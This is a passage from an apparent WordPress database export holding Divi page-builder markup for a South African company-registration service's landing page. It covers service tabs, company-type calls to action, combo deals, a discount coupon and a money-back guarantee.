animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:40:14','2019-08-08 08:40:14','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32394,3,'2019-08-08 10:42:28','2019-08-08 08:42:28','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" 